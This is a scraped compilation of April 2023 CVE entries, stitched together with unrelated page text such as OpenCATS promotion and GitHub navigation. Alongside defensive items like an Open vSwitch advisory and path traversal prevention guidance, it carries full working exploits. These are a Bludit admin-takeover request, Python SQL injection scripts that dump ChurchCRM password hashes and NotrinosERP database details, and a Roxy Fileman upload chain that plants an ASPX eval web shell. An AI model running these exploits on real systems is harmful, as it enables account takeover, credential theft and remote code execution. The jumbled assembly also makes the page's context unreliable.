A stored cross-site scripting (XSS) vulnerability in OpenCATS v0.9.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the state parameter at opencats/index.php?m=candidates.

*   User Support Forum
*   Documentation
*   News

OpenCATS is the open source ATS that helps you manage your recruitment process. With its customizable platform, you can streamline your recruitment process, attract top talent, and ultimately find the perfect candidate for your organization.

**Getting involved****Developers.. Send us your code!**

OpenCATS is a dynamic open-source project that is designed to revolutionize the recruitment process. Our mission is to empower organizations to find top talent and streamline their recruitment process. We believe that community engagement is critical to achieving this goal, which is why we're inviting you to join us and be a part of this exciting project. By participating in the OpenCATS community, you'll have the opportunity to work alongside talented individuals from around the world, collaborate on innovative solutions, and contribute to the development of a powerful ATS platform. Whether you're a developer, designer, or simply passionate about HR technology, we welcome you to get involved and help us shape the future of recruitment. Join us and be a part of a community that is making a real difference. Help us bring the power of open-source technology to the world of recruitment and make a positive impact on the industry.

The development is happening in the GitHub repository.

**OpenCATS User Community**

The OpenCATS user forum is a space for our community to come together and share ideas, ask questions, and provide support to each other. By participating in the forum, you'll have the opportunity to connect with other OpenCATS users, learn from their experiences, and gain insights into how they're using the platform to streamline their recruitment process. You'll also be able to contribute your own expertise and help others in the community. Not only is the user forum a great way to connect with other users and build relationships, but it's also a space where you can help us make OpenCATS even better. We rely on our community to provide us with feedback and suggestions for improvements, and the user forum is the perfect place to share your thoughts. So, if you're an OpenCATS user, we encourage you to get involved in the user forum today. Join the conversation, make new connections, and help us make OpenCATS the best it can be. We can't wait to hear from you in the OpenCATS User forum!

**FAQs**

Is it ready to download and run now with all the features?

Yes! Some features will require customisation after installation - for example full-text resume search and ACL role setup can be amended after the fact, but the initial installation delivers the base functionality.

When will the new version be available?

Continuous development occurs on the project, and we will snapshot releases when it improves stability or adds new features.

What operating systems will be supported?

All current Linux distributions will continue to be supported, as are current WAMP/XAMP installations.

How are new Vulnerabilities tracked and closed?

Vulnerability announcements are made in the news section, however increased code scanning has resulted in more vulnerability detections in recent months - so we will publish a tracker with all known vulnerabilities against the most recent codebase and track the open/closed status.

CVE-2023-26847: Home - OpenCATS Applicant Tracking System

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-26847: GitHub - cassis-sec/CVE: List of vulnerabilities that I discovered.

Bludit version 4.0.0-rc-2 suffers from an account takeover vulnerability due to an API key that can be abused to change the administrative password.

    ## Title: Bludit-4.0.0-rc-2 - Release candidate 2 Account takeover:API token vulnerability## Author: nu11secur1ty## Date: 04.11.2013## Vendor: https://www.bludit.com/## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit## Description:The already authenticated attacker can send a normal request to changehis password and then he can usethe same JSON `object` and the vulnerable `API token KEY` in the samerequest to change the admin account password.Then he can access the admin account and he can do very malicious stuff.STATUS: HIGH Vulnerability[+]Exploit:```PUTPUT /api/users/admin HTTP/1.1Host: 127.0.0.1:8000Content-Length: 138sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50Safari/537.36content-type: application/jsonAccept: */*Origin: http://127.0.0.1:8000Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8000/admin/edit-user/pwnedAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthuiConnection: close{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}```[+]Response:```HTTPHTTP/1.1 200 OKHost: 127.0.0.1:8000Date: Tue, 11 Apr 2023 08:33:51 GMTConnection: closeX-Powered-By: PHP/7.4.30Access-Control-Allow-Origin: *Content-Type: application/json{"status":"0","message":"User edited.","data":{"key":"admin"}}```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)## Proof and Exploit:[href](https://streamable.com/w3aa4d)## Time spend:00:57:00

Bludit 4.0.0-rc-2 Privilege Escalation

GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.

Play Labs on this vulnerability with SecureFlag!

1.  Unrestricted File Download
    1.  Description
    2.  Impact
    3.  Scenarios
    4.  Prevention
    5.  Testing

**Description**

Unrestricted File Downloads are a type of vulnerability that allow a malicious actor to download internal files, resulting in the potential, unintentional exposure of sensitive files, such as the configuration file, which contains credentials for the database. In milder forms, Unrestricted File Download attacks allow access to a specific directory subtree but could still enable cross-user breaches or access to crucial configuration and sensitive files.

**Impact**

The damage an attacker can cause by employing this type of attack is really only limited by the value of the exposed information. If a developer has structured their web root folder to include sensitive configuration files, for example, the fallout will, of course, be highly damaging. Furthermore, as with many other attacks that are a part of the attacker’s toolkit, the vulnerability can be used by an attacker as a stepping stone, leading to the full compromise of the system.

**Scenarios**

A classic scenario is a web application that dynamically fetches _resources_ according to a query parameter; and the available resources are stored in a particular directory within the file systems. For example, the following URL fetches the /opt/wwwdata/assets/some-file file and uses it to build the web page, possibly returning it verbatim:

    http://www.vulnerableapp.com/?pageId=some-file
    

The Directory Traversal technique is commonly used to exploit this type of vulnerability in file systems; the nickname “dot-dot-slash” is often used as an alternative label given the punctuated order of symbols (../ and ..\) that allow access to unintended resources of the server’s file system.

If no checks or sanitisation are in place, it is possible to traverse the resources directory and target any file on the file system. For example, the following fetches the sensitive /etc/passwd file on Linux and other unix-derived systems:

    http://www.vulnerableapp.com/?pageId=../../../../../etc/passwd
    

**Prevention**

If possible, developers should avoid building file path strings with user-provided input. Many functions of an application can be rewritten to deliver functionally identical behavior but in a safer manner.

If passing user-supplied input to a filesystem API is absolutely necessary, developers must ensure the following:

*   Validate the user input by strictly accepting well-known, reputable candidates against an allow list
*   If validating against an allow list isn’t possible, validation should at least ensure that only permitted content is contained in the input

As defense in depth, developers should never run a server component with root or SYSTEM privileges, as this can enable access to any file or folder, including crypto keys and the registry, to a malicious actor exploiting this vulnerability. Server components should be run using a less-privileged user with no access to critical system files.

**Testing**

Verify that user-submitted filename metadata is not used directly by system or framework filesystems and that a URL API is used to protect against path traversal.

*   **OWASP ASVS**: 12.3.1
*   **OWASP Testing Guide**: Testing for Local File Inclusion, Testing Directory Traversal File Include

**Table of contents**

*   Unrestricted File Download in .NET
*   Unrestricted File Download in Android
*   Unrestricted File Download in Go Lang
*   Unrestricted File Download in Java
*   Unrestricted File Download in NodeJS
*   Unrestricted File Download in PHP
*   Unrestricted File Download in Python
*   Unrestricted File Download in Ruby
*   Unrestricted File Download in Scala

CVE-2023-27179: Unrestricted File Download Vulnerability

A flaw was found in openvswitch (OVS). When processing an IP packet with protocol 0, OVS will install the datapath flow without the action modifying the IP header. This issue results (for both kernel and userspace datapath) in installing a datapath flow matching all IP protocols (nw_proto is wildcarded) for this flow, but with an incorrect action, possibly causing incorrect handling of other IP packets with a != 0 IP protocol that matches this dp flow.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 6 Apr 2023 19:37:53 +0200
From: Ilya Maximets <i.maximets@....org>
To: oss-security@...ts.openwall.com, ovs-announce@...nvswitch.org,
 ovs-discuss <ovs-discuss@...nvswitch.org>
Cc: i.maximets@....org, Aaron Conole <aconole@...hat.com>,
 Flavio Leitner <fbl@...hat.com>, David Marchand <david.marchand@...hat.com>
Subject: \[ADVISORY\] CVE-2023-1668: Open vSwitch: Remote traffic denial of
 service via crafted packets with IP proto 0

Description
===========

Multiple versions of Open vSwitch are vulnerable to crafted IP packets
with ip proto set to 0 causing a potential denial of service.
Triggering the vulnerability will require an attacker to send a crafted
IP packet with protocol field set to 0 and the flow rules to contain
'set' actions on other fields in the IP protocol header.  The resulting
flows will omit required actions, and fail to mask the IP protocol field,
resulting in a large bucket which captures all IP packets.

All versions of Open vSwitch at least as early as 1.5.0 are affected.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the identifier CVE-2023-1668 to this issue.


Mitigation
==========

For any version of Open vSwitch, preventing packets with network
protocol number '0' from reaching Open vSwitch will prevent the issue.
This is difficult to achieve because Open vSwitch obtains packets before
the iptables or nftables host firewall, so iptables or nftables on the
Open vSwitch host cannot ordinarily block the vulnerability.

Another method would be to add a high priority rule to the flow table
explicitly matching on nw protocol '0' and handling that traffic
separately:

    table=0 priority=32768,ip,nw\_proto=0,actions=drop
    table=0 priority=32768,ipv6,nw\_proto=0,actions=drop
    table=0 priority=32768,arp,arp\_op=0,actions=drop

All 3 OpenFlow rules should be added to every OVS bridge.  This can
be difficult to maintain during the service restart.


Fix
===

Patches to fix these vulnerabilities in Open vSwitch 2.13.x and newer:

\* 3.1.x:
  https://github.com/openvswitch/ovs/commit/61b39d8c4797f1b668e4d5e5350d639fca6082a9
\* 3.0.x:
  https://github.com/openvswitch/ovs/commit/0ec9af260ad84225e758d249fa32151ddf8a6520
\* 2.17.x:
  https://github.com/openvswitch/ovs/commit/27fb5db7f727ffc056f024f9ba4936facccb5f40
\* 2.16.x:
  https://github.com/openvswitch/ovs/commit/42f2b4b9b9a3c11d38f180bf1e35c47b77cd4ce8
\* 2.15.x:
  https://github.com/openvswitch/ovs/commit/f36509fd64e339ffd33593451099be6baa12ffe6
\* 2.14.x:
  https://github.com/openvswitch/ovs/commit/b46505f4d26cd4612a533687e7884efcb7a74111
\* 2.13.x:
  https://github.com/openvswitch/ovs/commit/7fa0106e8594c34f9e16efd87a58e38a947c6c5b

Recommendation
==============

We recommend that users of Open vSwitch apply the linked patches, or
upgrade to a known patched version of Open vSwitch.  These include:

\* 3.1.1
\* 3.0.4
\* 2.17.6
\* 2.16.7
\* 2.15.8
\* 2.14.9
\* 2.13.11


Acknowledgements
================

The Open vSwitch team wishes to thank the reporter:

      David Marchand <dmarchan@...hat.com>
**Download attachment "**OpenPGP\_0xB9F7EC77C829BF96.asc**" of type "**application/pgp-keys**" (4740 bytes)**

**Download attachment "**OpenPGP\_signature**" of type "**application/pgp-signature**" (841 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-1668: security - [ADVISORY] CVE-2023-1668: Open vSwitch: Remote traffic denial of service via crafted packets with IP proto 0

SilverwareGames.io versions before 1.2.19 allow users with access to the game upload panel to edit download links for games uploaded by other developers. This has been fixed in version 1.2.19.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 0

*   Code
*   Issues 62
*   Pull requests
*   Discussions
*   Actions
*   Projects
*   Security
*   Insights

Low

mesosoi published GHSA-m6h6-wph7-498f

Apr 8, 2023

**Package**

product.php (SilverwareGames.io)

**Affected versions**

< 1.2.19

**Description**

Users with access to the game upload panel were able to edit download links for games uploaded by other developers. There's no sign that such a vulnerability has been exploited by anyone. This has been fixed in version 1.2.19 and does not require any interaction from our users.

**Severity**

**CVSS base metrics**

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

**Weaknesses**

CVE-2023-29192: Users with access to the game upload panel are able to edit download links for games uploaded by other developers

A vulnerability, which was classified as critical, has been found in Dynamic Widgets Plugin up to 1.5.10. This issue affects some unknown processing of the file classes/dynwid_class.php. The manipulation leads to sql injection. The attack may be initiated remotely. Upgrading to version 1.5.11 is able to address this issue. The name of the patch is d0a19c6efcdc86d7093b369bc9e29a0629e57795. It is recommended to upgrade the affected component. The identifier VDB-225353 was assigned to this vulnerability.

CVE-2015-10100

ChurchCRM version 4.5.1 suffers from a remote authenticated SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.1# Tested on: Windows, Linux# CVE: CVE-2023-24787"""The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the username and password hash from user_usr table."""import sys, requestsdef dumpUserTable(target, session_cookies):        print("(+) Retrieving username and password")    print("")    url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)    headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}                  r = requests.get(url, headers=headers)    lines = r.text.splitlines()        for line in lines:         if "<td >Perseverance" in line:            print(line.split("Perseverance")[1].split("</td>")[0])    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")    dumpUserTable(target, session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.1 SQL Injection

NotrinosERP version 0.7 suffers from a remote authentication blind SQL injection vulnerability.

    # Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7# Vendor Homepage: https://notrinos.com/# Version: 0.7# Tested on: Windows, Linux# CVE: CVE-2023-24788"""The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.The OrderNumber parameter require a valid orderNumber value.This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}                      r = requests.get(url, headers=headers)        res = r.text        if "NotrinosERP 0.7 - Login" in res:            session_cookies = login(target, username, password)            headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}            r = requests.get(url, headers=headers)        elif (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef login(target, username, password):    target = "%s/index.php" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')    def retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_name += chr(retrieved_value)                    else:            break    print("Database Name: "+db_name) def retrieveDBVersion(session_cookies):    db_version = ""    print("(+) Retrieving database version")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_version += chr(retrieved_value)            sys.stdout.flush()        else:            break    print("Database Version: "+db_version)def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)           print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)    print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

NotrinosERP 0.7 SQL Injection

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Tag

#php